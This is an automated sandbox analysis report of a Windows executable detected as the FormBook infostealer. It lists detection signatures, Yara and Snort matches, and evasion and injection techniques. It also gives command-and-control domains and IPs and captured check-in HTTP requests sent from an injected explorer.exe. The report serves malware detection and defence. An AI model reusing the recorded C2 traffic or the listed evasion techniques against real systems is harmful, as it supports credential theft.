Windows Analysis Report ejecutable1.exe

Overview

General Information

Sample Name: ejecutable1.exe
Analysis ID: 491544
MD5: ff2724ddf0ef0525e9e419db5199e96f
SHA1: 3cda3d12e93a6e06f22e205010cb6c3d674285a1
SHA256: 5a5510cd8e0b77c01caac5b519c66d07d1621682e08179ead01adbc8d517b913
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: ejecutable1.exe Virustotal: Detection: 36% Perma Link
Source: ejecutable1.exe ReversingLabs: Detection: 13%
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.ejecutable1.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: ejecutable1.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: ejecutable1.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdb source: ejecutable1.exe, msdt.exe
Source: Binary string: msdt.pdb source: ejecutable1.exe, 00000002.00000003.441140636.0000000002880000.00000004.00000001.sdmp

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.dunedinhyperlocal.com
Source: C:\Windows\explorer.exe Domain query: www.multicoininvestment.com
Source: C:\Windows\explorer.exe Domain query: www.wwiilive.com
Source: C:\Windows\explorer.exe Domain query: www.institutosamar.com
Source: C:\Windows\explorer.exe Domain query: www.petersonmovingco.com
Source: C:\Windows\explorer.exe Domain query: www.quinnwebster.top
Source: C:\Windows\explorer.exe Domain query: www.lianxiwan.xyz
Source: C:\Windows\explorer.exe Domain query: www.oinfoproduto.com
Source: C:\Windows\explorer.exe Domain query: www.theseattlenotary.com
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.lianxiwan.xyz
Source: DNS query: www.lianxiwan.xyz
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== HTTP/1.1Host: www.wwiilive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz HTTP/1.1Host: www.dunedinhyperlocal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== HTTP/1.1Host: www.oinfoproduto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== HTTP/1.1Host: www.multicoininvestment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1Host: www.theseattlenotary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1Host: www.petersonmovingco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== HTTP/1.1Host: www.quinnwebster.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 15:32:40 GMTServer: nginx/1.19.5Content-Type: text/htmlContent-Length: 583Last-Modified: Sat, 24 Jul 2021 10:05:02 GMTAccept-Ranges: bytesVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
Source: msdt.exe, 00000004.00000002.666583195.000000000041F000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: msdt.exe, 00000004.00000002.666583195.000000000041F000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp String found in binary or memory: http://business.google.com/
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp String found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000003.00000000.428142762.0000000003E50000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667305054.00000000020E0000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: msdt.exe, 00000004.00000002.666538687.00000000003F9000.00000004.00000020.sdmp, msdt.exe, 00000004.00000002.666548050.0000000000406000.00000004.00000020.sdmp String found in binary or memory: http://www.lianxiwan.xyz/u4an/?1bxhyLu=2dVJIgnicdapxBfC0e
Source: explorer.exe, 00000003.00000000.414954186.0000000007147000.00000004.00000001.sdmp String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000003.00000000.413576733.0000000004513000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000003.00000000.433820327.0000000008434000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: ejecutable1.exe, ejecutable1.exe, 00000002.00000000.405132537.0000000000F52000.00000020.00020000.sdmp, msdt.exe, 00000004.00000002.668352306.0000000002A87000.00000004.00020000.sdmp String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp String found in binary or memory: https://ads.google.com/localservices
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp String found in binary or memory: https://business.google.com
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp String found in binary or memory: https://schema.org/Locuseriness
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp String found in binary or memory: https://workspace.google.com
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: unknown DNS traffic detected: queries for: www.wwiilive.com
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== HTTP/1.1Host: www.wwiilive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz HTTP/1.1Host: www.dunedinhyperlocal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== HTTP/1.1Host: www.oinfoproduto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== HTTP/1.1Host: www.multicoininvestment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1Host: www.theseattlenotary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1Host: www.petersonmovingco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== HTTP/1.1Host: www.quinnwebster.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: ejecutable1.exe, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 0.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 0.2.ejecutable1.exe.f50000.3.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 2.2.ejecutable1.exe.f50000.4.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 2.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Uses 32bit PE files
Source: ejecutable1.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
